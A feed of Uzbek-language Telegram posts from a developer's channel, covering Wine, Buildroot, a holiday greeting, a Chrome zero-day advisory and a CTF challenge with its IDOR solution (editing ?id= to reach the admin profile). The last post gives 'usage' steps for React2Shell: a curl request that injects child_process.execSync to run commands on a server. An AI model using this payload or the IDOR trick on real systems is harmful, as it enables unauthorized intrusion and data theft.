𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

Wine — Linuxda .exe dasturlarni ishga tushirish imkonini beruvchi kutubxona. U Windows tizimini to‘liq o‘rnatmasdan turib ko‘plab dastur va o‘yinlarni ochishga yordam beradi

Afzalliklari:
• Yengil va tez ishlaydi
• Virtual mashina talab qilmaydi
• Ko‘plab dasturlar bilan mos
O‘rnatish:

sudo apt update
sudo apt install wine

Ishga tushirish:

wine dastur.exe

@uzcodingblog

🔥4

202 viewsOzodbek Zayniddinov, edited 05:16

𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

#metroda

Buildroot – bu o‘rnatiladigan qurilmalar (embedded systems) uchun minimal Linux tizimini yig‘ishga mo‘ljallangan build tizim. Odatda monitorlar, routerlar, sanoat panellari va transport displeylarida ishlatiladi, ya’ni bu oddiy kompyuter emas — maxsus qurilma ichida ishlaydigan kichik Linux tizimi

@uzcodingblog

264 viewsOzodbek Zayniddinov, 06:04

𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

space.html

13 KB

ozodbekdev.uz/space website kodi

❗️Tashqi browserda oching, telegram da emas

@uzcodingblog

Please open Telegram to view this post

VIEW IN TELEGRAM

5❤3

785 viewsOzodbek Zayniddinov, edited 14:53

𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

https://www.instagram.com/reel/DVJdvKvCI0G

255 viewsOzodbek Zayniddinov, 16:52

𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

🔐 Nishon: ozodbekdev.uz/ctf

Missiya: Tizim arxitekturasidagi mantiqiy zaiflikni ekspluatatsiya qilib, Boshqaruvchi profilidagi CTF{...} maxfiy kodini qo'lga kiritish Ro'yxatdan o'tganingizda tizim sizga avtomatik ravishda eng pas yani oxirgi darajani beradi siz esa TASHKILOT BOSHLIG'I malumotlariga kirishingiz kerak

🧭Zaiflik darajasi: oddiy

😈

Tizimni muvaffaqiyatli buzib kirganlar izohlarda skrinshot qoldirsin

#CyberLab

Please open Telegram to view this post

VIEW IN TELEGRAM

223 viewsOzodbek Zayniddinov, edited 10:25

𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

🔐 Nishon: ozodbekdev.uz/ctf Missiya: Tizim arxitekturasidagi mantiqiy zaiflikni ekspluatatsiya qilib, Boshqaruvchi profilidagi CTF{...} maxfiy kodini qo'lga kiritish Ro'yxatdan o'tganingizda tizim sizga avtomatik ravishda eng pas yani oxirgi darajani beradi…

https://t.me/uzcodingblog/556?comment=5752
ZAIFLIK TOPILDI

Qanday ishladi?
Ro'yxatdan o'tganingizda URL manzilda ?id=101 kabi o'zingizning raqamingiz chiqdi. Siz raqamni shunchaki 1 ga o'zgartirdingiz va to'g'ridan-to'g'ri Admin profiliga kirib bordingiz.

Xato qayerda?
Sayt ma'lumot chiqarishdan oldin foydalanuvchini umuman tekshirmagan. Ya'ni, "Bu ma'lumotni so'rayotgan odam rostdan ham shu profil egasimi?" degan mantiqiy tekshiruv kodda yo'q edi. Server shunchaki ko'r-ko'rona ishonib, adminning sirini hammaga ochib berdi.

227 viewsOzodbek Zayniddinov, edited 16:07

𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

💐

8 mart - Xalqaro xotin-qizlar kuni

Yurtimizning muhtaram va aziz ayollari!

Sizlarni 8 mart — Xalqaro xotin-qizlar bayrami bilan tabriklayman
Mamlakatimiz taraqqiyoti, jamiyat ravnaqi va kelajak avlodni tarbiyalashda xotin-qizlarning o‘rni beqiyosdir. Sizlar o‘zingizning fidokorona mehnatingiz, yuksak mas’uliyatingiz va mehr-oqibatingiz bilan har bir sohada munosib hissa qo‘shib kelmoqdasiz.
Shu fayzli bahor ayyomida sizlarga mustahkam sog‘liq, oilaviy baxt-saodat, xonadonlaringizga tinchlik-xotirjamlik, mas’uliyatli faoliyatingizda ulkan yutuqlar tilayman!

@ozodbekdevv

Please open Telegram to view this post

VIEW IN TELEGRAM

❤‍🔥4❤2💘1

218 viewsOzodbek Zayniddinov, edited 19:26

𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

🤣7

211 viewsOzodbek Zayniddinov, 14:05

𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

Forwarded from UzCERT Live

⚠️

Google Chrome’da aniqlangan yangi “Zero-Day” zaifliklar: foydalanuvchilarga zudlik bilan yangilanish o‘rnatish tavsiya etiladi

📱 Google kompaniyasi o‘zining mashhur brauzeri — Google Chrome uchun favqulodda xavfsizlik yangilanishini e’lon qildi. Sababi — brauzerda aniqlangan ikki muhim zero-day zaiflik allaqachon real kiberhujumlarda faol qo‘llanilayotgani tasdiqlangan.

💻 Mutaxassislarning ma’lumotiga ko‘ra, ushbu zaifliklar yordamida hujumchilar foydalanuvchi tizimida zararli kodni ishga tushirishi, brauzer xavfsizlik mexanizmlarini chetlab o‘tishi hamda qurilma ustidan nazoratni qo‘lga kiritishi mumkin.

✅ Mazkur tahdidni bartaraf etish maqsadida Chrome brauzerining 146.0.7680.75/76 versiyasi Windows va macOS tizimlari uchun, 146.0.7680.75 versiyasi esa Linux uchun chiqarildi. Yangilanish bosqichma-bosqich tarzda butun dunyo foydalanuvchilariga yetkazilmoqda.

📱

Batafsil

#Google #Chrome #Windows #macOS #Linux #zaiflik

🚀

UZCERT xizmatining rasmiy telegram sahifasiga a’zo bo‘ling!

Please open Telegram to view this post

VIEW IN TELEGRAM

133 viewsOzodbek Zayniddinov, 15:40

𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

React2Shell (CVE-2025-55182)

Yaqinda React va Next.js ekotizimida juda xavfli zaiflik aniqlangan. Bu zaiflik React Server Components (RSC) ishlatiladigan serverlarda masofadan turib buyruq bajarishga (Remote Code Execution) imkon beradi.
Muammo RSC “Flight protocol” maʼlumotlarini notoʻgʻri qayta ishlash bilan bogʻliq. Maxsus tayyorlangan payload orqali hujumchi server tomonda Node.js modullarini chaqirishi va OS buyruqlarini bajarishi mumkin. Shuningdek 15million aholi malumotlari aynan shu zaiflik asosida olingan

- CVE: CVE-2025-55182
- Nom: React2Shell
- Turi: Remote Code Execution (RCE)
- Taʼsir qiluvchi texnologiyalar: React Server Components, Next.js App Router
- CVSS bahosi: 9.8 – 10.0 (Critical)

@uzcodingblog

5❤1

141 viewsOzodbek Zayniddinov, edited 09:37

𝗢𝘇𝗼𝗱𝗯𝗲𝗸𝗗𝗲𝘃

Foydalanish:
Ushbu zaiflikdan faqat React oʻrnatilgan serverlarda foydalanishimiz mumkin shu sabab serverda React mavjudligini tekshiramiz bu uchun esa Wappoalyzer dan foydalanamiz :

npm install -g wappalyzer
wappalyzer https://example.com

Foydalanilgan texnologiyalar orasida React mavjud boʻlsa bu serverda React2Shell zaifligi boʻlishi mumkin. Zaiflikdan foydalanib Server da amal bajarish uchun:

curl -s -X POST http://example.com:4000/api/rsc/render \
-H "Content-Type: application/json" \
-d '{"flight":"0:require(\"child_process\").execSync(\"whoami\").toString()"}'

Bu orqali server terminalida whois buyrugʻini berdik va javob ubuntu tarzida chiqadi